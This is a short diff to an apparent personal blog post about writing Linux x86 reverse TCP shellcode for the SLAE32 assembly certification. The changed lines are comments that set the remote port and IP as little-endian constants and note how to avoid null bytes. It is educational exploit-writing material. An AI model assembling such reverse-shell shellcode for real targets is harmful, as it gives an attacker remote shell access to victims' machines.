gulyslae/gulyslae.github.io/_posts/2019-08-04-SLAE32-reverse_tcp.md

     ; 65533 converted in hex, then little endian rport equ 0xFDFF
     ; 172.16.201.162 in hex, then little endian
-    ; i'm lucky that i don't have any 0 in my address, else raddr will contain null bytes. i'm going to publish also a 02_revshell_tcp_127.0.0.1.asm to challenge myself a bit raddr equ 0xa2c910ac
+    ; i'm lucky that i don't have any 0 in my address, else raddr will contain null bytes ; i'm going to publish also a 02_revshell_tcp_127.0.0.1.asm to challenge myself a bit raddr equ 0xa2c910ac

-    ; This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
+*This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/